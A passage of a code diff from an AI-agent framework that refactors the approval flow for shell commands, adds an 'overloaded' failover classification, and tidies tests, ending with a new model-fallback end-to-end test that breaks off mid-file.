b/src/agents/bash-tools.exec-host-node.ts @@ -18,14 +18,12 @@ import { registerExecApprovalRequestForHostOrThrow, } from "./bash-tools.exec-approval-request.js"; import { + createDefaultExecApprovalRequestContext, + resolveBaseExecApprovalDecision, resolveApprovalDecisionOrUndefined, resolveExecHostApprovalContext, } from "./bash-tools.exec-host-shared.js"; -import { - DEFAULT_APPROVAL_TIMEOUT_MS, - createApprovalSlug, - emitExecSystemEvent, -} from "./bash-tools.exec-runtime.js"; +import { createApprovalSlug, emitExecSystemEvent } from "./bash-tools.exec-runtime.js"; import type { ExecToolDetails } from "./bash-tools.exec-types.js"; import { callGatewayTool } from "./tools/gateway.js"; import { listNodes, resolveNodeIdFromList } from "./tools/nodes-utils.js"; @@ -209,13 +207,21 @@ export async function executeNodeHostCommand( }) satisfies Record; if (requiresAsk) { - const approvalId = crypto.randomUUID(); - const approvalSlug = createApprovalSlug(approvalId); - const contextKey = `exec:${approvalId}`; - const noticeSeconds = Math.max(1, Math.round(params.approvalRunningNoticeMs / 1000)); - const warningText = params.warnings.length ? `${params.warnings.join("\n")}\n\n` : ""; - let expiresAtMs = Date.now() + DEFAULT_APPROVAL_TIMEOUT_MS; - let preResolvedDecision: string | null | undefined; + const { + approvalId, + approvalSlug, + contextKey, + noticeSeconds, + warningText, + expiresAtMs: defaultExpiresAtMs, + preResolvedDecision: defaultPreResolvedDecision, + } = createDefaultExecApprovalRequestContext({ + warnings: params.warnings, + approvalRunningNoticeMs: params.approvalRunningNoticeMs, + createApprovalSlug, + }); + let expiresAtMs = defaultExpiresAtMs; + let preResolvedDecision = defaultPreResolvedDecision; // Register first so the returned approval ID is actionable immediately. const registration = await registerExecApprovalRequestForHostOrThrow({ @@ -252,23 +258,17 @@ export async function executeNodeHostCommand( return; } - let approvedByAsk = false; + const baseDecision = resolveBaseExecApprovalDecision({ + decision, + askFallback, + obfuscationDetected: obfuscation.detected, + }); + let approvedByAsk = baseDecision.approvedByAsk; let approvalDecision: "allow-once" | "allow-always" | null = null; - let deniedReason: string | null = null; + let deniedReason = baseDecision.deniedReason; - if (decision === "deny") { - deniedReason = "user-denied"; - } else if (!decision) { - if (obfuscation.detected) { - deniedReason = "approval-timeout (obfuscation-detected)"; - } else if (askFallback === "full") { - approvedByAsk = true; - approvalDecision = "allow-once"; - } else if (askFallback === "allowlist") { - // Defer allowlist enforcement to the node host. - } else { - deniedReason = "approval-timeout"; - } + if (baseDecision.timedOut && askFallback === "full" && approvedByAsk) { + approvalDecision = "allow-once"; } else if (decision === "allow-once") { approvedByAsk = true; approvalDecision = "allow-once"; diff --git a/src/agents/bash-tools.exec-host-shared.ts b/src/agents/bash-tools.exec-host-shared.ts index 37ee0320c3f..eef3575fed3 100644 --- a/src/agents/bash-tools.exec-host-shared.ts +++ b/src/agents/bash-tools.exec-host-shared.ts @@ -1,3 +1,4 @@ +import crypto from "node:crypto"; import { maxAsk, minSecurity, @@ -6,6 +7,7 @@ import { type ExecSecurity, } from "../infra/exec-approvals.js"; import { resolveRegisteredExecApprovalDecision } from "./bash-tools.exec-approval-request.js"; +import { DEFAULT_APPROVAL_TIMEOUT_MS } from "./bash-tools.exec-runtime.js"; type ResolvedExecApprovals = ReturnType; @@ -16,6 +18,110 @@ export type ExecHostApprovalContext = { askFallback: ResolvedExecApprovals["agent"]["askFallback"]; }; +export type ExecApprovalPendingState = { + warningText: string; + expiresAtMs: number; + preResolvedDecision: string | null | undefined; +}; + +export type ExecApprovalRequestState = ExecApprovalPendingState & { + noticeSeconds: number; +}; + +export function createExecApprovalPendingState(params: { + warnings: string[]; + timeoutMs: number; +}): ExecApprovalPendingState { + return { + warningText: params.warnings.length ? `${params.warnings.join("\n")}\n\n` : "", + expiresAtMs: Date.now() + params.timeoutMs, + preResolvedDecision: undefined, + }; +} + +export function createExecApprovalRequestState(params: { + warnings: string[]; + timeoutMs: number; + approvalRunningNoticeMs: number; +}): ExecApprovalRequestState { + const pendingState = createExecApprovalPendingState({ + warnings: params.warnings, + timeoutMs: params.timeoutMs, + }); + return { + ...pendingState, + noticeSeconds: Math.max(1, Math.round(params.approvalRunningNoticeMs / 1000)), + }; +} + +export function createExecApprovalRequestContext(params: { + warnings: string[]; + timeoutMs: number; + approvalRunningNoticeMs: number; + createApprovalSlug: (approvalId: string) => string; +}): ExecApprovalRequestState & { + approvalId: string; + approvalSlug: string; + contextKey: string; +} { + const approvalId = crypto.randomUUID(); + const pendingState = createExecApprovalRequestState({ + warnings: params.warnings, + timeoutMs: params.timeoutMs, + approvalRunningNoticeMs: params.approvalRunningNoticeMs, + }); + return { + ...pendingState, + approvalId, + approvalSlug: params.createApprovalSlug(approvalId), + contextKey: `exec:${approvalId}`, + }; +} + +export function createDefaultExecApprovalRequestContext(params: { + warnings: string[]; + approvalRunningNoticeMs: number; + createApprovalSlug: (approvalId: string) => string; +}) { + return createExecApprovalRequestContext({ + warnings: params.warnings, + timeoutMs: DEFAULT_APPROVAL_TIMEOUT_MS, + approvalRunningNoticeMs: params.approvalRunningNoticeMs, + createApprovalSlug: params.createApprovalSlug, + }); +} + +export function resolveBaseExecApprovalDecision(params: { + decision: string | null; + askFallback: ResolvedExecApprovals["agent"]["askFallback"]; + obfuscationDetected: boolean; +}): { + approvedByAsk: boolean; + deniedReason: string | null; + timedOut: boolean; +} { + if (params.decision === "deny") { + return { approvedByAsk: false, deniedReason: "user-denied", timedOut: false }; + } + if (!params.decision) { + if (params.obfuscationDetected) { + return { + approvedByAsk: false, + deniedReason: "approval-timeout (obfuscation-detected)", + timedOut: true, + }; + } + if (params.askFallback === "full") { + return { approvedByAsk: true, deniedReason: null, timedOut: true }; + } + if (params.askFallback === "deny") { + return { approvedByAsk: false, deniedReason: "approval-timeout", timedOut: true }; + } + return { approvedByAsk: false, deniedReason: null, timedOut: true }; + } + return { approvedByAsk: false, deniedReason: null, timedOut: false }; +} + export function resolveExecHostApprovalContext(params: { agentId?: string; security: ExecSecurity; diff --git a/src/agents/bash-tools.exec-runtime.ts b/src/agents/bash-tools.exec-runtime.ts index 2a5a7d4eb2c..9714e4255ee 100644 --- a/src/agents/bash-tools.exec-runtime.ts +++ b/src/agents/bash-tools.exec-runtime.ts @@ -1,7 +1,7 @@ import path from "node:path"; import type { AgentToolResult } from "@mariozechner/pi-agent-core"; import { Type } from "@sinclair/typebox"; -import type { ExecAsk, ExecHost, ExecSecurity } from "../infra/exec-approvals.js"; +import { type ExecHost } from "../infra/exec-approvals.js"; import { requestHeartbeatNow } from "../infra/heartbeat-wake.js"; import { isDangerousHostEnvVarName } from "../infra/host-env-security.js"; import { findPathKey, mergePathPrepend } from "../infra/path-prepend.js"; @@ -11,6 +11,11 @@ import type { ProcessSession } from "./bash-process-registry.js"; import type { ExecToolDetails } from "./bash-tools.exec-types.js"; import type { BashSandboxConfig } from "./bash-tools.shared.js"; export { applyPathPrepend, findPathKey, normalizePathPrepend } from "../infra/path-prepend.js"; +export { + normalizeExecAsk, + normalizeExecHost, + normalizeExecSecurity, +} from "../infra/exec-approvals.js"; import { logWarn } from "../logger.js"; import type { ManagedRun } from "../process/supervisor/index.js"; import { getProcessSupervisor } from "../process/supervisor/index.js"; @@ -156,30 +161,6 @@ export type ExecProcessHandle = { kill: () => void; }; -export function normalizeExecHost(value?: string | null): ExecHost | null { - const normalized = value?.trim().toLowerCase(); - if (normalized === "sandbox" || normalized === "gateway" || normalized === "node") { - return normalized; - } - return null; -} - -export function normalizeExecSecurity(value?: string | null): ExecSecurity | null { - const normalized = value?.trim().toLowerCase(); - if (normalized === "deny" || normalized === "allowlist" || normalized === "full") { - return normalized; - } - return null; -} - -export function normalizeExecAsk(value?: string | null): ExecAsk | null { - const normalized = value?.trim().toLowerCase(); - if (normalized === "off" || normalized === "on-miss" || normalized === "always") { - return normalized as ExecAsk; - } - return null; -} - export function renderExecHostLabel(host: ExecHost) { return host === "sandbox" ? "sandbox" : host === "gateway" ? "gateway" : "node"; } diff --git a/src/agents/bootstrap-cache.ts b/src/agents/bootstrap-cache.ts index 03c4a923464..98ca267994f 100644 --- a/src/agents/bootstrap-cache.ts +++ b/src/agents/bootstrap-cache.ts @@ -20,6 +20,17 @@ export function clearBootstrapSnapshot(sessionKey: string): void { cache.delete(sessionKey); } +export function clearBootstrapSnapshotOnSessionRollover(params: { + sessionKey?: string; + previousSessionId?: string; +}): void { + if (!params.sessionKey || !params.previousSessionId) { + return; + } + + clearBootstrapSnapshot(params.sessionKey); +} + export function clearAllBootstrapSnapshots(): void { cache.clear(); } diff --git a/src/agents/cache-trace.ts b/src/agents/cache-trace.ts index 5084614501c..46d51579258 100644 --- a/src/agents/cache-trace.ts +++ b/src/agents/cache-trace.ts @@ -8,6 +8,7 @@ import { parseBooleanValue } from "../utils/boolean.js"; import { safeJsonStringify } from "../utils/safe-json.js"; import { redactImageDataForDiagnostics } from "./payload-redaction.js"; import { getQueuedFileWriter, type QueuedFileWriter } from "./queued-file-writer.js"; +import { buildAgentTraceBase } from "./trace-base.js"; export type CacheTraceStage = | "session:loaded" @@ -173,15 +174,7 @@ export function createCacheTrace(params: CacheTraceInit): CacheTrace | null { const writer = params.writer ?? getWriter(cfg.filePath); let seq = 0; - const base: Omit = { - runId: params.runId, - sessionId: params.sessionId, - sessionKey: params.sessionKey, - provider: params.provider, - modelId: params.modelId, - modelApi: params.modelApi, - workspaceDir: params.workspaceDir, - }; + const base: Omit = buildAgentTraceBase(params); const recordStage: CacheTrace["recordStage"] = (stage, payload = {}) => { const event: CacheTraceEvent = { diff --git a/src/agents/compaction.identifier-preservation.test.ts b/src/agents/compaction.identifier-preservation.test.ts index cdf742e1489..139c4923b27 100644 --- a/src/agents/compaction.identifier-preservation.test.ts +++ b/src/agents/compaction.identifier-preservation.test.ts @@ -31,7 +31,7 @@ describe("compaction identifier-preservation instructions", () => { } as unknown as NonNullable; const summarizeBase: Omit = { model: testModel, - apiKey: "test-key", + apiKey: "test-key", // pragma: allowlist secret reserveTokens: 4000, maxChunkTokens: 8000, contextWindow: 200_000, diff --git a/src/agents/compaction.test.ts b/src/agents/compaction.test.ts index 9fa8fcee53a..afd8c776942 100644 --- a/src/agents/compaction.test.ts +++ b/src/agents/compaction.test.ts @@ -6,6 +6,7 @@ import { pruneHistoryForContextShare, splitMessagesByTokenShare, } from "./compaction.js"; +import { makeAgentAssistantMessage } from "./test-helpers/agent-message-fixtures.js"; function makeMessage(id: number, size: number): AgentMessage { return { @@ -24,26 +25,15 @@ function makeAssistantToolCall( toolCallId: string, text = "x".repeat(4000), ): AssistantMessage { - return { - role: "assistant", + return makeAgentAssistantMessage({ content: [ { type: "text", text }, { type: "toolCall", id: toolCallId, name: "test_tool", arguments: {} }, ], - api: "openai-responses", - provider: "openai", model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, stopReason: "stop", timestamp, - }; + }); } function makeToolResult(timestamp: number, toolCallId: string, text: string): ToolResultMessage { @@ -229,27 +219,16 @@ describe("pruneHistoryForContextShare", () => { // all corresponding tool_results should be removed from kept messages const messages: AgentMessage[] = [ // Chunk 1 (will be dropped) - contains multiple tool_use blocks - { - role: "assistant", + makeAgentAssistantMessage({ content: [ { type: "text", text: "x".repeat(4000) }, { type: "toolCall", id: "call_a", name: "tool_a", arguments: {} }, { type: "toolCall", id: "call_b", name: "tool_b", arguments: {} }, ], - api: "openai-responses", - provider: "openai", model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, stopReason: "stop", timestamp: 1, - }, + }), // Chunk 2 (will be kept) - contains orphaned tool_results makeToolResult(2, "call_a", "result_a"), makeToolResult(3, "call_b", "result_b"), diff --git a/src/agents/compaction.tool-result-details.test.ts b/src/agents/compaction.tool-result-details.test.ts index 0570fc52bdb..581e596ccbe 100644 --- a/src/agents/compaction.tool-result-details.test.ts +++ b/src/agents/compaction.tool-result-details.test.ts @@ -1,6 +1,7 @@ import type { AgentMessage } from "@mariozechner/pi-agent-core"; import type { AssistantMessage, ToolResultMessage } from "@mariozechner/pi-ai"; import { beforeEach, describe, expect, it, vi } from "vitest"; +import { makeAgentAssistantMessage } from "./test-helpers/agent-message-fixtures.js"; const piCodingAgentMocks = vi.hoisted(() => ({ generateSummary: vi.fn(async () => "summary"), @@ -21,23 +22,12 @@ vi.mock("@mariozechner/pi-coding-agent", async () => { import { isOversizedForSummary, summarizeWithFallback } from "./compaction.js"; function makeAssistantToolCall(timestamp: number): AssistantMessage { - return { - role: "assistant", + return makeAgentAssistantMessage({ content: [{ type: "toolCall", id: "call_1", name: "browser", arguments: { action: "tabs" } }], - api: "openai-responses", - provider: "openai", model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, stopReason: "toolUse", timestamp, - }; + }); } function makeToolResultWithDetails(timestamp: number): ToolResultMessage<{ raw: string }> { diff --git a/src/agents/context.lookup.test.ts b/src/agents/context.lookup.test.ts index 81263481c34..584f9c27cbb 100644 --- a/src/agents/context.lookup.test.ts +++ b/src/agents/context.lookup.test.ts @@ -1,33 +1,37 @@ import { beforeEach, describe, expect, it, vi } from "vitest"; +function mockContextModuleDeps(loadConfigImpl: () => unknown) { + vi.doMock("../config/config.js", () => ({ + loadConfig: loadConfigImpl, + })); + vi.doMock("./models-config.js", () => ({ + ensureOpenClawModelsJson: vi.fn(async () => {}), + })); + vi.doMock("./agent-paths.js", () => ({ + resolveOpenClawAgentDir: () => "/tmp/openclaw-agent", + })); + vi.doMock("./pi-model-discovery.js", () => ({ + discoverAuthStorage: vi.fn(() => ({})), + discoverModels: vi.fn(() => ({ + getAll: () => [], + })), + })); +} + describe("lookupContextTokens", () => { beforeEach(() => { vi.resetModules(); }); it("returns configured model context window on first lookup", async () => { - vi.doMock("../config/config.js", () => ({ - loadConfig: () => ({ - models: { - providers: { - openrouter: { - models: [{ id: "openrouter/claude-sonnet", contextWindow: 321_000 }], - }, + mockContextModuleDeps(() => ({ + models: { + providers: { + openrouter: { + models: [{ id: "openrouter/claude-sonnet", contextWindow: 321_000 }], }, }, - }), - })); - vi.doMock("./models-config.js", () => ({ - ensureOpenClawModelsJson: vi.fn(async () => {}), - })); - vi.doMock("./agent-paths.js", () => ({ - resolveOpenClawAgentDir: () => "/tmp/openclaw-agent", - })); - vi.doMock("./pi-model-discovery.js", () => ({ - discoverAuthStorage: vi.fn(() => ({})), - discoverModels: vi.fn(() => ({ - getAll: () => [], - })), + }, })); const { lookupContextTokens } = await import("./context.js"); @@ -36,21 +40,7 @@ describe("lookupContextTokens", () => { it("does not skip eager warmup when --profile is followed by -- terminator", async () => { const loadConfigMock = vi.fn(() => ({ models: {} })); - vi.doMock("../config/config.js", () => ({ - loadConfig: loadConfigMock, - })); - vi.doMock("./models-config.js", () => ({ - ensureOpenClawModelsJson: vi.fn(async () => {}), - })); - vi.doMock("./agent-paths.js", () => ({ - resolveOpenClawAgentDir: () => "/tmp/openclaw-agent", - })); - vi.doMock("./pi-model-discovery.js", () => ({ - discoverAuthStorage: vi.fn(() => ({})), - discoverModels: vi.fn(() => ({ - getAll: () => [], - })), - })); + mockContextModuleDeps(loadConfigMock); const argvSnapshot = process.argv; process.argv = ["node", "openclaw", "--profile", "--", "config", "validate"]; @@ -79,21 +69,7 @@ describe("lookupContextTokens", () => { }, })); - vi.doMock("../config/config.js", () => ({ - loadConfig: loadConfigMock, - })); - vi.doMock("./models-config.js", () => ({ - ensureOpenClawModelsJson: vi.fn(async () => {}), - })); - vi.doMock("./agent-paths.js", () => ({ - resolveOpenClawAgentDir: () => "/tmp/openclaw-agent", - })); - vi.doMock("./pi-model-discovery.js", () => ({ - discoverAuthStorage: vi.fn(() => ({})), - discoverModels: vi.fn(() => ({ - getAll: () => [], - })), - })); + mockContextModuleDeps(loadConfigMock); const argvSnapshot = process.argv; process.argv = ["node", "openclaw", "config", "validate"]; diff --git a/src/agents/failover-error.test.ts b/src/agents/failover-error.test.ts index 60e7510e67e..f581dd0ede2 100644 --- a/src/agents/failover-error.test.ts +++ b/src/agents/failover-error.test.ts @@ -75,7 +75,7 @@ describe("failover-error", () => { expect(resolveFailoverReasonFromError({ status: 522 })).toBeNull(); expect(resolveFailoverReasonFromError({ status: 523 })).toBeNull(); expect(resolveFailoverReasonFromError({ status: 524 })).toBeNull(); - expect(resolveFailoverReasonFromError({ status: 529 })).toBe("rate_limit"); + expect(resolveFailoverReasonFromError({ status: 529 })).toBe("overloaded"); }); it("classifies documented provider error shapes at the error boundary", () => { @@ -90,7 +90,7 @@ describe("failover-error", () => { status: 529, message: ANTHROPIC_OVERLOADED_PAYLOAD, }), - ).toBe("rate_limit"); + ).toBe("overloaded"); expect( resolveFailoverReasonFromError({ status: 429, @@ -126,7 +126,22 @@ describe("failover-error", () => { status: 503, message: GROQ_SERVICE_UNAVAILABLE_MESSAGE, }), + ).toBe("overloaded"); + }); + + it("keeps status-only 503s conservative unless the payload is clearly overloaded", () => { + expect( + resolveFailoverReasonFromError({ + status: 503, + message: "Internal database error", + }), ).toBe("timeout"); + expect( + resolveFailoverReasonFromError({ + status: 503, + message: '{"error":{"message":"The model is overloaded. Please try later"}}', + }), + ).toBe("overloaded"); }); it("treats 400 insufficient_quota payloads as billing instead of format", () => { @@ -151,6 +166,14 @@ describe("failover-error", () => { ).toBe("rate_limit"); }); + it("treats overloaded provider payloads as overloaded", () => { + expect( + resolveFailoverReasonFromError({ + message: ANTHROPIC_OVERLOADED_PAYLOAD, + }), + ).toBe("overloaded"); + }); + it("keeps raw-text 402 weekly/monthly limit errors in billing", () => { expect( resolveFailoverReasonFromError({ @@ -221,6 +244,10 @@ describe("failover-error", () => { expect(err?.model).toBe("claude-opus-4-5"); }); + it("maps overloaded to a 503 fallback status", () => { + expect(resolveFailoverStatus("overloaded")).toBe(503); + }); + it("coerces format errors with a 400 status", () => { const err = coerceToFailoverError("invalid request format", { provider: "google", diff --git a/src/agents/failover-error.ts b/src/agents/failover-error.ts index 5c16d3508fd..a39685e1b16 100644 --- a/src/agents/failover-error.ts +++ b/src/agents/failover-error.ts @@ -49,6 +49,8 @@ export function resolveFailoverStatus(reason: FailoverReason): number | undefine return 402; case "rate_limit": return 429; + case "overloaded": + return 503; case "auth": return 401; case "auth_permanent": diff --git a/src/agents/model-auth.test.ts b/src/agents/model-auth.test.ts index 86bc6bba5a0..943070960d3 100644 --- a/src/agents/model-auth.test.ts +++ b/src/agents/model-auth.test.ts @@ -7,7 +7,7 @@ describe("resolveAwsSdkEnvVarName", () => { const env = { AWS_BEARER_TOKEN_BEDROCK: "bearer", AWS_ACCESS_KEY_ID: "access", - AWS_SECRET_ACCESS_KEY: "secret", + AWS_SECRET_ACCESS_KEY: "secret", // pragma: allowlist secret AWS_PROFILE: "default", } as NodeJS.ProcessEnv; @@ -17,7 +17,7 @@ describe("resolveAwsSdkEnvVarName", () => { it("uses access keys when bearer token is missing", () => { const env = { AWS_ACCESS_KEY_ID: "access", - AWS_SECRET_ACCESS_KEY: "secret", + AWS_SECRET_ACCESS_KEY: "secret", // pragma: allowlist secret AWS_PROFILE: "default", } as NodeJS.ProcessEnv; diff --git a/src/agents/model-auth.ts b/src/agents/model-auth.ts index 734cd7b2666..68a117c96a9 100644 --- a/src/agents/model-auth.ts +++ b/src/agents/model-auth.ts @@ -90,7 +90,7 @@ function resolveSyntheticLocalProviderAuth(params: { } return { - apiKey: "ollama-local", + apiKey: "ollama-local", // pragma: allowlist secret source: "models.providers.ollama (synthetic local key)", mode: "api-key", }; diff --git a/src/agents/model-fallback.probe.test.ts b/src/agents/model-fallback.probe.test.ts index f220646cf3d..8dafd6533da 100644 --- a/src/agents/model-fallback.probe.test.ts +++ b/src/agents/model-fallback.probe.test.ts @@ -53,7 +53,7 @@ function expectPrimaryProbeSuccess( expect(result.result).toBe(expectedResult); expect(run).toHaveBeenCalledTimes(1); expect(run).toHaveBeenCalledWith("openai", "gpt-4.1-mini", { - allowRateLimitCooldownProbe: true, + allowTransientCooldownProbe: true, }); } @@ -200,10 +200,48 @@ describe("runWithModelFallback – probe logic", () => { expect(result.result).toBe("fallback-ok"); expect(run).toHaveBeenCalledTimes(2); expect(run).toHaveBeenNthCalledWith(1, "openai", "gpt-4.1-mini", { - allowRateLimitCooldownProbe: true, + allowTransientCooldownProbe: true, }); expect(run).toHaveBeenNthCalledWith(2, "anthropic", "claude-haiku-3-5", { - allowRateLimitCooldownProbe: true, + allowTransientCooldownProbe: true, + }); + }); + + it("attempts non-primary fallbacks during overloaded cooldown after primary probe failure", async () => { + const cfg = makeCfg({ + agents: { + defaults: { + model: { + primary: "openai/gpt-4.1-mini", + fallbacks: ["anthropic/claude-haiku-3-5", "google/gemini-2-flash"], + }, + }, + }, + } as Partial); + + mockedIsProfileInCooldown.mockReturnValue(true); + mockedGetSoonestCooldownExpiry.mockReturnValue(NOW + 30 * 1000); + mockedResolveProfilesUnavailableReason.mockReturnValue("overloaded"); + + const run = vi + .fn() + .mockRejectedValueOnce(Object.assign(new Error("service overloaded"), { status: 503 })) + .mockResolvedValue("fallback-ok"); + + const result = await runWithModelFallback({ + cfg, + provider: "openai", + model: "gpt-4.1-mini", + run, + }); + + expect(result.result).toBe("fallback-ok"); + expect(run).toHaveBeenCalledTimes(2); + expect(run).toHaveBeenNthCalledWith(1, "openai", "gpt-4.1-mini", { + allowTransientCooldownProbe: true, + }); + expect(run).toHaveBeenNthCalledWith(2, "anthropic", "claude-haiku-3-5", { + allowTransientCooldownProbe: true, }); }); @@ -326,10 +364,10 @@ describe("runWithModelFallback – probe logic", () => { }); expect(run).toHaveBeenNthCalledWith(1, "openai", "gpt-4.1-mini", { - allowRateLimitCooldownProbe: true, + allowTransientCooldownProbe: true, }); expect(run).toHaveBeenNthCalledWith(2, "openai", "gpt-4.1-mini", { - allowRateLimitCooldownProbe: true, + allowTransientCooldownProbe: true, }); }); }); diff --git a/src/agents/model-fallback.run-embedded.e2e.test.ts b/src/agents/model-fallback.run-embedded.e2e.test.ts new file mode 100644 index 00000000000..61afb89c6bb --- /dev/null +++ b/src/agents/model-fallback.run-embedded.e2e.test.ts @@ -0,0 +1,517 @@ +import fs from "node:fs/promises"; +import os from "node:os"; +import path from "node:path"; +import type { AssistantMessage } from "@mariozechner/pi-ai"; +import { beforeAll, beforeEach, describe, expect, it, vi } from "vitest"; +import type { OpenClawConfig } from "../config/config.js"; +import type { AuthProfileFailureReason } from "./auth-profiles.js"; +import { runWithModelFallback } from "./model-fallback.js"; +import type { EmbeddedRunAttemptResult } from "./pi-embedded-runner/run/types.js"; + +const runEmbeddedAttemptMock = vi.fn<(params: unknown) => Promise>(); +const { computeBackoffMock, sleepWithAbortMock } = vi.hoisted(() => ({ + computeBackoffMock: vi.fn( + ( + _policy: { initialMs: number; maxMs: number; factor: number; jitter: number }, + _attempt: number, + ) => 321, + ), + sleepWithAbortMock: vi.fn(async (_ms: number, _abortSignal?: AbortSignal) => undefined), +})); + +vi.mock("./pi-embedded-runner/run/attempt.js", () => ({ + runEmbeddedAttempt: (params: unknown) => runEmbeddedAttemptMock(params), +})); + +vi.mock("../infra/backoff.js", () => ({ + computeBackoff: ( + policy: { initialMs: number; maxMs: number; factor: number; jitter: number }, + attempt: number, + ) => computeBackoffMock(policy, attempt), + sleepWithAbort: (ms: number, abortSignal?: AbortSignal) => sleepWithAbortMock(ms, abortSignal), +})); + +vi.mock("./models-config.js", async (importOriginal) => { + const mod = await importOriginal(); + return { + ...mod, + ensureOpenClawModelsJson: vi.fn(async () => ({ wrote: false })), + }; +}); + +let runEmbeddedPiAgent: typeof import("./pi-embedded-runner/run.js").runEmbeddedPiAgent; + +beforeAll(async () => { + ({ runEmbeddedPiAgent } = await import("./pi-embedded-runner/run.js")); +}); + +beforeEach(() => { + runEmbeddedAttemptMock.mockReset(); + computeBackoffMock.mockClear(); + sleepWithAbortMock.mockClear(); +}); + +const baseUsage = { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, +}; + +const OVERLOADED_ERROR_PAYLOAD = + '{"type":"error","error":{"type":"overloaded_error","message":"Overloaded"}}'; + +const buildAssistant = (overrides: Partial): AssistantMessage => ({ + role: "assistant", + content: [], + api: "openai-responses", + provider: "openai", + model: "mock-1", + usage: baseUsage, + stopReason: "stop", + timestamp: Date.now(), + ...overrides, +}); + +const makeAttempt = (overrides: Partial): EmbeddedRunAttemptResult => ({ + aborted: false, + timedOut: false, + timedOutDuringCompaction: false, + promptError: null, + sessionIdUsed: "session:test", + systemPromptReport: undefined, + messagesSnapshot: [], + assistantTexts: [], + toolMetas: [], + lastAssistant: undefined, + didSendViaMessagingTool: false, + messagingToolSentTexts: [], + messagingToolSentMediaUrls: [], + messagingToolSentTargets: [], + cloudCodeAssistFormatError: false, + ...overrides, +}); + +function makeConfig(): OpenClawConfig { + return { + agents: { + defaults: { + model: { + primary: "openai/mock-1", + fallbacks: ["groq/mock-2"], + }, + }, + }, + models: { + providers: { + openai: { + api: "openai-responses", + apiKey: "sk-openai", + baseUrl: "https://example.com/openai", + models: [ + { + id: "mock-1", + name: "Mock 1", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 16_000, + maxTokens: 2048, + }, + ], + }, + groq: { + api: "openai-responses", + apiKey: "sk-groq", + baseUrl: "https://example.com/groq", + models: [ + { + id: "mock-2", + name: "Mock 2", + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 16_000, + maxTokens: 2048, + }, + ], + }, + }, + }, + } satisfies OpenClawConfig; +} + +async function withAgentWorkspace( + fn: (ctx: { agentDir: string; workspaceDir: string }) => Promise, +): Promise { + const root = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-model-fallback-")); + const agentDir = path.join(root, "agent"); + const workspaceDir = path.join(root, "workspace"); + await fs.mkdir(agentDir, { recursive: true }); + await fs.mkdir(workspaceDir, { recursive: true }); + try { + return await fn({ agentDir, workspaceDir }); + } finally { + await fs.rm(root, { recursive: true, force: true }); + } +} + +async function writeAuthStore( + agentDir: string, + usageStats?: Record< + string, + { + lastUsed?: number; + cooldownUntil?: number; + disabledUntil?: number; + disabledReason?: AuthProfileFailureReason; + failureCounts?: Partial>; + } + >, +) { + await fs.writeFile( + path.join(agentDir, "auth-profiles.json"), + JSON.stringify({ + version: 1, + profiles: { + "openai:p1": { type: "api_key", provider: "openai", key: "sk-openai" }, + "groq:p1": { type: "api_key", provider: "groq", key: "sk-groq" }, + }, + usageStats: + usageStats ?? + ({ + "openai:p1": { lastUsed: 1 }, + "groq:p1": { lastUsed: 2 }, + } as const), + }), + ); +} + +async function readUsageStats(agentDir: string) { + const raw = await fs.readFile(path.join(agentDir, "auth-profiles.json"), "utf-8"); + return JSON.parse(raw).usageStats as Record | undefined>; +} + +async function runEmbeddedFallback(params: { + agentDir: string; + workspaceDir: string; + sessionKey: string; + runId: string; + abortSignal?: AbortSignal; +}) { + const cfg = makeConfig(); + return await runWithModelFallback({ + cfg, + provider: "openai", + model: "mock-1", + agentDir: params.agentDir, + run: (provider, model, options) => + runEmbeddedPiAgent({ + sessionId: `session:${params.runId}`, + sessionKey: params.sessionKey, + sessionFile: path.join(params.workspaceDir, `${params.runId}.jsonl`), + workspaceDir: params.workspaceDir, + agentDir: params.agentDir, + config: cfg, + prompt: "hello", + provider, + model, + authProfileIdSource: "auto", + allowTransientCooldownProbe: options?.allowTransientCooldownProbe, + timeoutMs: 5_000, + runId: params.runId, + abortSignal: params.abortSignal, + }), + }); +} + +function mockPrimaryOverloadedThenFallbackSuccess() { + runEmbeddedAttemptMock.mockImplementation(async (params: unknown) => { + const attemptParams = params as { provider: string; modelId: string; authProfileId?: string }; + if (attemptParams.provider === "openai") { + return makeAttempt({ + assistantTexts: [], + lastAssistant: buildAssistant({ + provider: "openai", + model: "mock-1", + stopReason: "error", + errorMessage: OVERLOADED_ERROR_PAYLOAD, + }), + }); + } + if (attemptParams.provider === "groq") { + return makeAttempt({ + assistantTexts: ["fallback ok"], + lastAssistant: buildAssistant({ + provider: "groq", + model: "mock-2", + stopReason: "stop", + content: [{ type: "text", text: "fallback ok" }], + }), + }); + } + throw new Error(`Unexpected provider ${attemptParams.provider}`); + }); +} + +function mockAllProvidersOverloaded() { + runEmbeddedAttemptMock.mockImplementation(async (params: unknown) => { + const attemptParams = params as { provider: string; modelId: string; authProfileId?: string }; + if (attemptParams.provider === "openai" || attemptParams.provider === "groq") { + return makeAttempt({ + assistantTexts: [], + lastAssistant: buildAssistant({ + provider: attemptParams.provider, + model: attemptParams.provider === "openai" ? "mock-1" : "mock-2", + stopReason: "error", + errorMessage: OVERLOADED_ERROR_PAYLOAD, + }), + }); + } + throw new Error(`Unexpected provider ${attemptParams.provider}`); + }); +} + +describe("runWithModelFallback + runEmbeddedPiAgent overload policy", () => { + it("falls back across providers after overloaded primary failure and persists transient cooldown", async () => { + await withAgentWorkspace(async ({ agentDir, workspaceDir }) => { + await writeAuthStore(agentDir); + mockPrimaryOverloadedThenFallbackSuccess(); + + const result = await runEmbeddedFallback({ + agentDir, + workspaceDir, + sessionKey: "agent:test:overloaded-cross-provider", + runId: "run:overloaded-cross-provider", + }); + + expect(result.provider).toBe("groq"); + 